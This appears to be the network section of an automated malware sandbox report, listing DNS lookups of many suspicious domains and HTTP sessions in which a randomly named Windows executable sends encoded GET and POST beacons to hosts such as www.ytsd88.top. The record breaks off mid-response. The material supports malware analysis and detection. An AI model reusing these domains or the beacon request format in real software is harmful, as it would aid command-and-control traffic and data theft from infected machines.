                                                                    Jan 11, 2025 08:18:49.281776905 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:49.286823034 CET8050006104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:49.287600040 CET5000680192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:50.301573038 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:50.306442976 CET8050007104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:50.307586908 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:50.329575062 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:50.334388971 CET8050007104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:51.841588020 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:51.846554995 CET8050007104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:51.849575043 CET5000780192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:54.375397921 CET5000880192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:54.380248070 CET8050008104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:54.381594896 CET5000880192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:54.397610903 CET5000880192.168.2.7104.21.42.77
                                                                    Jan 11, 2025 08:18:54.402543068 CET8050008104.21.42.77192.168.2.7
                                                                    Jan 11, 2025 08:18:54.402580976 CET8050008104.21.42.77192.168.2.7
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 11, 2025 08:16:36.251415968 CET6184353192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:16:36.263565063 CET53618431.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:16:41.297271967 CET6316953192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:16:41.316077948 CET53631691.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:16:57.797619104 CET6342153192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:16:58.580473900 CET53634211.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:17:12.236537933 CET5781553192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:17:12.712079048 CET53578151.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:17:25.970402002 CET5733353192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:17:25.981236935 CET53573331.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:17:39.127638102 CET5724253192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:17:39.393934011 CET53572421.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:17:53.033480883 CET5320153192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:17:53.716451883 CET53532011.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:18:07.486018896 CET5455253192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:18:07.497442961 CET53545521.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:18:20.766062975 CET5567053192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:18:20.787755013 CET53556701.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:18:33.922687054 CET5539853192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:18:34.471565008 CET53553981.1.1.1192.168.2.7
                                                                    Jan 11, 2025 08:18:47.720594883 CET6533253192.168.2.71.1.1.1
                                                                    Jan 11, 2025 08:18:47.739371061 CET53653321.1.1.1192.168.2.7
DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 11, 2025 08:16:36.251415968 CET | 192.168.2.7 | 1.1.1.1 | 0xb45e | Standard query (0) | www.grandesofertas.fun | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:16:41.297271967 CET | 192.168.2.7 | 1.1.1.1 | 0x93c7 | Standard query (0) | www.jijievo.site | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:16:57.797619104 CET | 192.168.2.7 | 1.1.1.1 | 0x9237 | Standard query (0) | www.ytsd88.top | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:17:12.236537933 CET | 192.168.2.7 | 1.1.1.1 | 0x688f | Standard query (0) | www.bpgroup.site | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:17:25.970402002 CET | 192.168.2.7 | 1.1.1.1 | 0xa874 | Standard query (0) | www.fortevision.xyz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:17:39.127638102 CET | 192.168.2.7 | 1.1.1.1 | 0xbf7e | Standard query (0) | www.rtpterbaruwaktu3.xyz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:17:53.033480883 CET | 192.168.2.7 | 1.1.1.1 | 0x467b | Standard query (0) | www.prhmcjdz.tokyo | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:18:07.486018896 CET | 192.168.2.7 | 1.1.1.1 | 0x7fef | Standard query (0) | www.connecty.live | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:18:20.766062975 CET | 192.168.2.7 | 1.1.1.1 | 0x8b54 | Standard query (0) | www.tals.xyz | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:18:33.922687054 CET | 192.168.2.7 | 1.1.1.1 | 0x2789 | Standard query (0) | www.50food.com | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:18:47.720594883 CET | 192.168.2.7 | 1.1.1.1 | 0xcc07 | Standard query (0) | www.zriaraem-skiry.sbs | A (IP address) | IN (0x0001) | false |
DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 11, 2025 08:16:36.263565063 CET | 1.1.1.1 | 192.168.2.7 | 0xb45e | Name error (3) | www.grandesofertas.fun | none | none | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:16:41.316077948 CET | 1.1.1.1 | 192.168.2.7 | 0x93c7 | No error (0) | www.jijievo.site | all.wjscdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 08:16:41.316077948 CET | 1.1.1.1 | 192.168.2.7 | 0x93c7 | No error (0) | all.wjscdn.com | | 154.205.156.26 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:16:41.316077948 CET | 1.1.1.1 | 192.168.2.7 | 0x93c7 | No error (0) | all.wjscdn.com | | 154.205.159.116 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:16:41.316077948 CET | 1.1.1.1 | 192.168.2.7 | 0x93c7 | No error (0) | all.wjscdn.com | | 38.54.112.227 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:16:41.316077948 CET | 1.1.1.1 | 192.168.2.7 | 0x93c7 | No error (0) | all.wjscdn.com | | 154.90.35.240 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:16:41.316077948 CET | 1.1.1.1 | 192.168.2.7 | 0x93c7 | No error (0) | all.wjscdn.com | | 154.90.58.209 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:16:41.316077948 CET | 1.1.1.1 | 192.168.2.7 | 0x93c7 | No error (0) | all.wjscdn.com | | 154.205.143.51 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:16:58.580473900 CET | 1.1.1.1 | 192.168.2.7 | 0x9237 | No error (0) | www.ytsd88.top | | 47.76.213.197 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:17:12.712079048 CET | 1.1.1.1 | 192.168.2.7 | 0x688f | No error (0) | www.bpgroup.site | bpgroup.site | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 08:17:12.712079048 CET | 1.1.1.1 | 192.168.2.7 | 0x688f | No error (0) | bpgroup.site | | 74.48.143.82 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:17:25.981236935 CET | 1.1.1.1 | 192.168.2.7 | 0xa874 | No error (0) | www.fortevision.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:17:25.981236935 CET | 1.1.1.1 | 192.168.2.7 | 0xa874 | No error (0) | www.fortevision.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:17:39.393934011 CET | 1.1.1.1 | 192.168.2.7 | 0xbf7e | No error (0) | www.rtpterbaruwaktu3.xyz | rtpterbaruwaktu3.xyz | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 08:17:39.393934011 CET | 1.1.1.1 | 192.168.2.7 | 0xbf7e | No error (0) | rtpterbaruwaktu3.xyz | | 103.21.221.87 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:17:53.716451883 CET | 1.1.1.1 | 192.168.2.7 | 0x467b | No error (0) | www.prhmcjdz.tokyo | ymx01.cn | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 08:17:53.716451883 CET | 1.1.1.1 | 192.168.2.7 | 0x467b | No error (0) | ymx01.cn | | 8.218.14.120 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:18:07.497442961 CET | 1.1.1.1 | 192.168.2.7 | 0x7fef | No error (0) | www.connecty.live | | 203.161.43.228 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:18:20.787755013 CET | 1.1.1.1 | 192.168.2.7 | 0x8b54 | No error (0) | www.tals.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 08:18:20.787755013 CET | 1.1.1.1 | 192.168.2.7 | 0x8b54 | No error (0) | www.tals.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
                                                                    Jan 11, 2025 08:18:34.471565008 CET1.1.1.1192.168.2.70x2789No error (0)www.50food.com147.255.21.187A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:47.739371061 CET1.1.1.1192.168.2.70xcc07No error (0)www.zriaraem-skiry.sbs104.21.42.77A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 08:18:47.739371061 CET1.1.1.1192.168.2.70xcc07No error (0)www.zriaraem-skiry.sbs172.67.159.61A (IP address)IN (0x0001)false
                                                                    • www.jijievo.site
                                                                    • www.ytsd88.top
                                                                    • www.bpgroup.site
                                                                    • www.fortevision.xyz
                                                                    • www.rtpterbaruwaktu3.xyz
                                                                    • www.prhmcjdz.tokyo
                                                                    • www.connecty.live
                                                                    • www.tals.xyz
                                                                    • www.50food.com
                                                                    • www.zriaraem-skiry.sbs
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49972 | 154.205.156.26 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 08:16:41.346120119 CET | 480 | OUT | GET /z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.jijievo.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Jan 11, 2025 08:16:42.756397963 CET | 197 | IN | HTTP/1.1 200 OK
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Date: Sat, 11 Jan 2025 07:16:42 GMT
                                                                    Server: nginx
                                                                    Vary: Accept-Encoding
                                                                    Content-Length: 24
                                                                    Connection: close
                                                                    Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                                    Data Ascii: Unable to get connection


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49973 | 47.76.213.197 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 08:16:58.633883953 CET | 729 | OUT | POST /8qt7/ HTTP/1.1
                                                                    Host: www.ytsd88.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.ytsd88.top
                                                                    Referer: http://www.ytsd88.top/8qt7/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 2b 43 65 42 58 6a 46 53 71 6e 63 35 65 37 70 42 78 44 30 66 5a 39 74 78 51 70 77 72 4b 66 55 43 4b 2f 38 47 30 70 66 61 50 43 77 70 48 59 70 62 67 3d 3d
                                                                    Data Ascii: QbUPL=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ff+CeBXjFSqnc5e7pBxD0fZ9txQpwrKfUCK/8G0pfaPCwpHYpbg==
Jan 11, 2025 08:16:59.497067928 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:16:59 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 409
                                                                    Connection: close
                                                                    ETag: "66d016cf-199"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49974 | 47.76.213.197 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 08:17:01.193464994 CET | 749 | OUT | POST /8qt7/ HTTP/1.1
                                                                    Host: www.ytsd88.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.ytsd88.top
                                                                    Referer: http://www.ytsd88.top/8qt7/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 65 43 39 36 46 44 66 64 6b 6d 4c 44 66 52 6d 53 63 33 56 41 45 72 76 37 4a 47 65 38 59 5a 4a 6f 36 62 4c 47 70 69 7a 78 67 58 73 37 64 6a 66 33 55 78 56 6f 62 45 51 53 47 51 6b 46 63 58 61 55 41 66 6c 30 50 64 4e 79 38 6c 49 53 50 43 52 67 6b 42 52 4a 2b 4e 44 6e 4f 45 2b 4d 55 4f 64 78 44 47 4c 49 39 46 54 38 4f 73 72 38 38 69 50 58 58 34 72 44 37 61 66 2b 4b 35 49 6d 2f 45 4c 59 6a 49 34 6f 36 4c 62 54 50 59 42 49 46 57 31 53 4e 47 38 73 43 68 41 4c 37 6b 4c 57 64 2b 46 34 6e 61 6b 56 35 74 4e 5a 42 73 38 74 67 54 34 4c 7a 65 41 76 35 7a 46 6a 54 6a 44 7a 73 3d
                                                                    Data Ascii: QbUPL=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6dreC96FDfdkmLDfRmSc3VAErv7JGe8YZJo6bLGpizxgXs7djf3UxVobEQSGQkFcXaUAfl0PdNy8lISPCRgkBRJ+NDnOE+MUOdxDGLI9FT8Osr88iPXX4rD7af+K5Im/ELYjI4o6LbTPYBIFW1SNG8sChAL7kLWd+F4nakV5tNZBs8tgT4LzeAv5zFjTjDzs=
Jan 11, 2025 08:17:02.077461958 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:01 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 409
                                                                    Connection: close
                                                                    ETag: "66d016cf-199"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49976 | 47.76.213.197 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 08:17:03.739660025 CET | 1762 | OUT | POST /8qt7/ HTTP/1.1
                                                                    Host: www.ytsd88.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.ytsd88.top
                                                                    Referer: http://www.ytsd88.top/8qt7/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 57 43 39 49 39 44 66 38 6b 6d 5a 54 66 52 6f 79 63 4d 56 41 45 4d 76 34 35 43 65 38 55 4a 4a 71 43 62 5a 56 68 69 6e 51 67 58 33 4c 64 6a 41 48 55 77 4e 49 62 52 51 53 58 5a 6b 45 73 58 61 55 41 66 6c 32 48 64 5a 58 49 6c 4b 53 50 42 5a 41 6b 4e 56 4a 2b 6c 44 6d 71 55 2b 4e 67 77 63 41 6a 47 4c 6f 4e 46 63 75 57 73 32 4d 38 67 4f 58 58 67 72 44 33 52 66 2b 57 31 49 6d 4c 75 4c 59 62 49 31 73 37 4c 45 79 33 51 66 4c 70 32 70 68 39 55 72 4e 47 6e 4d 39 7a 5a 57 57 34 63 49 2f 58 37 2f 6d 74 48 42 39 73 65 6a 62 51 42 32 36 2f 31 50 4c 6b 69 5a 67 37 6f 51 6c 42 35 44 48 6b 42 41 6d 4d 65 69 62 32 4f 50 55 55 46 47 2b 79 6f 37 30 42 72 7a 6b 71 79 63 6f 53 47 44 50 6b 45 69 4b 54 75 64 73 68 34 47 4a 6e 6a 4a 48 65 46 54 34 72 48 51 6d 33 48 43 49 57 6d 62 72 30 4d 66 4e 59 62 79 66 51 56 56 67 6e 39 63 54 2f 41 6b 4a 42 32 46 6f 44 38 77 79 57 50 34 6f 77 4b [TRUNCATED]
                                                                    Data Ascii: QbUPL=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 [TRUNCATED]
Jan 11, 2025 08:17:04.638664007 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:04 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 409
                                                                    Connection: close
                                                                    ETag: "66d016cf-199"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49977 | 47.76.213.197 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 08:17:06.281265974 CET | 478 | OUT | GET /8qt7/?QbUPL=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXiJxWYm89PNrsVDefynVEbypj6mz/ajpHDG/8Uzc6QbTSEQ6i7rwMVRjg&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.ytsd88.top
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Jan 11, 2025 08:17:07.188996077 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:07 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 409
                                                                    Connection: close
                                                                    ETag: "66d016cf-199"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 